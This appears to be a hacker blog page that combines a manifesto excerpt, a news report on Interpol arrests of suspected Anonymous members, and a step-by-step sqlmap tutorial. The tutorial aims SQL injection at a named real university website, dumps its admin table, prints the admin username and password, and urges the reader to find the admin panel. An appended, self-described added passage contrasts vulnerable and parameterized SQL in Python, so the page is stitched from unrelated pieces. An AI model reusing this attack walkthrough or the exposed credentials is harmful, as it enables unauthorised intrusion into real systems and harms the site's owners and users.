Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.

I am a hacker, and this is my manifesto. You may stop this individual,
but you can't stop us all... after all, we're all alike.

+++The Mentor+++

Tuesday, February 28

Interpol swoop nets 25 suspected 'Anonymous' hackers


Interpol has arrested 25 suspected members of the 'Anonymous' hackers group in a swoop on over a dozen cities in Europe and Latin America, the global police body said Tuesday.

"Operation Unmask was launched in mid-February following a series of coordinated cyber-attacks originating from Argentina, Chile, Colombia and Spain," said the world police body based in the French city of Lyon.

The statement cited attacks on the websites of the Colombian Ministry of Defence and the presidency, as well as on Chile's Endesa electricity company and its National Library, among others.

The operation was carried out by police from Argentina, Chile, Colombia and Spain, the statement said, with 250 items of computer equipment and mobile phones seized in raids on 40 premises in 15 cities.

Police also seized credit cards and cash from the suspects, aged 17 to 40.

"This operation shows that crime in the virtual world does have real consequences for those involved, and that the Internet cannot be seen as a safe haven for criminal activity," said Interpol's acting director of police services.

However, it was not clear what evidence there was to prove those arrested were part of Anonymous, an extremely loose-knit international movement of online activists, or "hacktivists."

Spanish police said earlier they had arrested four suspected hackers accused of sabotaging websites and publishing confidential data on the Internet.

They were accused of hacking political parties' and companies' websites and adding fangs to the faces of leaders in photographs online, and publishing data identifying top officials' security guards, Spanish police said.

The operation, carried out after trawling through computer logs in order to trace IP addresses, also netted 10 suspects in Argentina, six in Chile and five in Colombia, Spanish police said.

They said one of the suspects went by the nicknames Thunder and Pacotron and was suspected of running the computer network used by Anonymous in Spain and Latin America, via servers in the Czech Republic and Bulgaria.

He was arrested in the southern Spanish city of Malaga.

Two of the suspects were in detention while one was bailed and the fourth was a minor who was left in the care of his parents.

Tuesday, January 17

SQLmap Step By Step Tutorial

Today we will walk through sqlmap step by step.
Sqlmap is written in Python and ships with Backtrack 5, Backtrack 5 R1 and all versions of Backtrack. Otherwise you can download it separately with:

$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

Sqlmap is the best SQL injection tool.

With sqlmap we can identify the type of database (MySQL, SQL Server and so on), find the database name and the tables in that database, and dump the data from it.
It is a complete database takeover tool.

Steps:

1. First we need a vulnerable target; here it is:

http://www.hu.edu.pk/viewfaculty.php?id=12

2. Go to Backtrack and type cd /pentest/database/sqlmap




3. Run sqlmap

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12

-u specifies the vulnerable URL



./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs

or

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db




With --dbs, sqlmap fetches all the databases on the server.

With --current-db, it fetches only the database used by the current website.

This gives us the database name.

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables



After -D we give the database name.

--tables tells sqlmap to fetch the tables in that database.

This gives us the table names.



After that, we fetch the information for only the table we need:

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns

This gives us the names of the columns in that table, with their data types.





./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name --dump



Now we get all the data in the table "admin".






After finishing the whole process you have:




Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123


Now you have the admin username and admin password, find the Admin Panel and :)
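
SQL injection of the kind sqlmap automates in the steps above arises when a request value such as id is concatenated into the SQL text. The following is an added example, not code from the original post or from the site it names: it shows that pattern beside a hardened lookup on a constructed in-memory SQLite database. The faculty table, the function names and every row value are assumptions; admin, u_name and passwrd follow the names shown in the tutorial.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the site's database (all rows invented)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE faculty (id INTEGER PRIMARY KEY, name TEXT, dept TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, u_name TEXT, passwrd TEXT);
        INSERT INTO faculty VALUES (12, 'A. Example', 'Physics');
        INSERT INTO faculty VALUES (13, 'B. Sample', 'Chemistry');
        INSERT INTO admin VALUES (1, 'constructed_admin', 'constructed_secret');
    """)
    return db

def view_faculty_vulnerable(db, raw_id):
    # Vulnerable pattern: the request value becomes part of the SQL text,
    # so the database parses whatever the client sent as SQL.
    sql = "SELECT name, dept FROM faculty WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def view_faculty_hardened(db, raw_id):
    # 1) Allow-list the parameter: a short run of ASCII digits and nothing else.
    #    (A real handler would answer HTTP 400 here instead of returning no rows.)
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    # 2) Bind the value: it is sent as data and never parsed as SQL.
    sql = "SELECT name, dept FROM faculty WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

# Constructed injection-shaped value of the kind a scanner puts in ?id=
INJECTED = "12 UNION SELECT u_name, passwrd FROM admin"

if __name__ == "__main__":
    db = make_db()
    for value in ("12", INJECTED):
        print(repr(value))
        print("  vulnerable:", view_faculty_vulnerable(db, value))
        print("  hardened:  ", view_faculty_hardened(db, value))
```

Binding the value is what stops the query from changing shape; the allow-list additionally keeps malformed input away from the database layer.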